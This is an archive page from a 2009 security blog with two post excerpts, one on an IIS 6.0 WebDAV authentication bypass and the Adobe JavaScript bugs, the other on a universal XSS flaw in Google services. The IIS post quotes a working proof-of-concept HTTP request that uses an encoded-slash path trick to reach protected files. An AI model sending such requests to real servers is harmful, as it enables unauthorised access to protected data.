Archive for May, 2009

0

IIS 6.0 WebDav Exploit, Adobe 8-9.1 JavaScript Exploits, Cisco Works TFTPD Directory Traversal

Posted by dk
May 21, 2009

Microsoft IIS 6.0 with Webdav is vulnerable to an authentication bypass vulnerability. The exploit has already been made public:
http://www.milw0rm.com/exploits/8704
Proof of concept taken from above URL:
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
Adobe version 8-9.1 have been smacked with more JavaScript command execution bugs. A lot of vendors are starting to recommend disabling JavaScript, something I suggested back [...]

0

Universal XSS Vulnerability in Google

Posted by dk
May 11, 2009

It does worry me when Google services gets hacked with a Cross Site Scripting vulnerability that compromise just about everything.
Inferno released an advisory in Bugtraq stating that he discovered a method of exploiting the following Google items (to name a few):
1. Steal your emails.
2. Steal your contacts.
3. Steal your documents.
4. Steal your code.
5. Steal your [...]